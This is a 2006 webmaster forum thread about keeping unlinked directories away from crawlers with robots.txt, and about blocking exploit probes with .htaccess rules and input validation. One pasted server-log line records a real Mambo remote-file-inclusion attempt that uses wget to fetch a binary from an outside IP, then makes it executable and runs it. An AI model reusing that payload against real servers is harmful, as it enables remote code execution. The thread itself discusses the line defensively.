Forum Moderators: goodroi

Message Too Old, No Replies

Newbie robots.txt question

Can a robot find content not referenced in pages on the site?

         

joykesilon

5:13 pm on Mar 4, 2006 (gmt 0)

10+ Year Member



Hi,

I have a feeling this might be a stupid question, but I haven't been able to find a satisfactory answer anywhere.

I have a couple of directories in the root of my web site which are not referenced in any of the pages on the site (i.e. none of the pages on the site link to the directories or any of the files therein).

My question is, by adding a robots.txt file (allowing any user agent and disallowing nothing) is it possible for a robot to find those directories and their contents? I don't particularly want to advertise their existence by explicitly disallowing them - just in case.

All the pages on the site currently have the <meta name="robots" content="all" /> tag, which I assume is equivalent to the suggested robots.txt file above, and I'm assuming that the directories and their contents can't be found this way. In which case I may have answered my own question, but I just need confirmation for peace of mind before I go ahead and add the robots.txt file.
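(For reference, the "allow everything" robots.txt I'm describing would just be something like this - an empty Disallow means nothing is blocked:

```
User-agent: *
Disallow:
```

)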

Thanks in advance,

Ken.

Dijkgraaf

3:15 am on Mar 5, 2006 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



If it is publicly accessible on the web, then yes, there is a chance that it will get spidered.
All it takes is for someone to link to it somewhere, and it will get picked up and spidered.

Disallow rules match anything beginning with what you specify, so for example if you had a directory called notallowedhere you could use:
Disallow: /notallow

This way it doesn't reveal the full name of the directory, but will still tell good bots not to try to fetch things from there.
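Put together, a minimal robots.txt using that prefix trick might look like this (notallowedhere is just the example directory name from above):

```
User-agent: *
Disallow: /notallow
```

Anything whose path starts with /notallow (so /notallowedhere/ and everything under it) is covered, without the full directory name ever appearing in the file.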

This of course only works for well behaved bots. If you really want to restrict access, you will have to password protect the files.

joykesilon

10:35 am on Mar 5, 2006 (gmt 0)

10+ Year Member



Thanks for the reply. I hadn't appreciated that you could specify the beginning of a file or directory name for disallow; that could be an option.

I'm afraid I'm a little bit paranoid because my log file keeps showing things like this, which I assume are attempts to find and exploit vulnerabilities:

64.50.10.100 - - [05/Mar/2006:05:28:16 +0000] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo¦ HTTP/1.1" 404 309

64.50.10.100 - - [05/Mar/2006:05:28:23 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306

Is there anything I can do about these, or do I have to live with them (slightly OT, I know - apologies)?

Dijkgraaf

8:02 pm on Mar 6, 2006 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Yes, that looks like an attempt to exploit a Mambo vulnerability.

There is nothing you can do to stop people sending requests like that.

If your server is an Apache server you could try adding rules to your .htaccess that would deny requests like that, but you would have to be careful implementing those, otherwise you could deny legitimate traffic.
For IIS you can run a lockdown utility that will intercept some of those types of requests, and websites built with the .NET framework also include some checks against those types of exploits.
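As a rough sketch of the Apache approach (assuming mod_rewrite is available - adapt the pattern to your own traffic before relying on it), you could block requests that try to pass a remote URL as a parameter value, which is what the Mambo exploit attempt in your log is doing:

```
# .htaccess sketch: reject requests whose query string injects a
# remote http:// or https:// URL into a parameter (a common
# remote-file-inclusion pattern). Test carefully first - a rule
# this broad can catch legitimate requests that pass URLs.
RewriteEngine On
RewriteCond %{QUERY_STRING} (^|&)[^=]*=https?:// [NC]
RewriteRule .* - [F]
```

The [F] flag returns 403 Forbidden instead of letting the request reach your scripts.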

Other than that, you just have to make sure that whatever dynamic pages you use verify all GET and POST parameters and reject anything that is not expected/allowed.
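As a hypothetical illustration of that whitelist idea (the parameter names here just mirror the ones in the logged exploit attempt; ALLOWED_OPTIONS and validate_params are made-up names, not part of any real framework):

```python
# Sketch: accept a request only if every expected parameter passes
# a strict check; reject anything else outright.
ALLOWED_OPTIONS = {"com_content", "com_weblinks"}  # hypothetical whitelist

def validate_params(params):
    """Return True only if the parameters look like a legitimate request."""
    option = params.get("option", "")
    itemid = params.get("Itemid", "")
    if option not in ALLOWED_OPTIONS:
        # Rejects injected values like "http://163.24.84.10/heade.gif?"
        return False
    if not itemid.isdigit():
        # Itemid must be a plain integer, nothing more
        return False
    return True
```

The point is to validate against what you expect (a short list of known values, digits only) rather than trying to blacklist every possible attack string.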